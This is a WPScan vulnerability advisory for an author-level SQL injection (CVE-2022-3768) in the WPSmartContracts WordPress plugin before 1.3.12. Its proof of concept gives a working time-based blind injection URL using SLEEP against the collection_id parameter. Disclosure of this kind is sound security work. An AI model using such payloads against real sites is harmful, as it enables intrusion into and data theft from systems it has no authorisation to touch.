WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPSmartContracts < 1.3.12 - Author+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author

Proof of Concept

Logon as an author and open the following URL, which will result in a delayed response

https://example.com/wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid=1

Affects Plugins

wp-smart-contracts
Fixed in version 1.3.12

References

CVE
CVE-2022-3768
URL
https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)

Submitter

Kunal Sharma

Submitter website
https://iese.fraunhofer.de/en.html
Verified

Yes

WPVDB ID
1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3

Timeline

Publicly Published

2022-11-07 (about 4 months ago)

Added

2022-11-07 (about 4 months ago)

Last Updated

2022-12-02 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin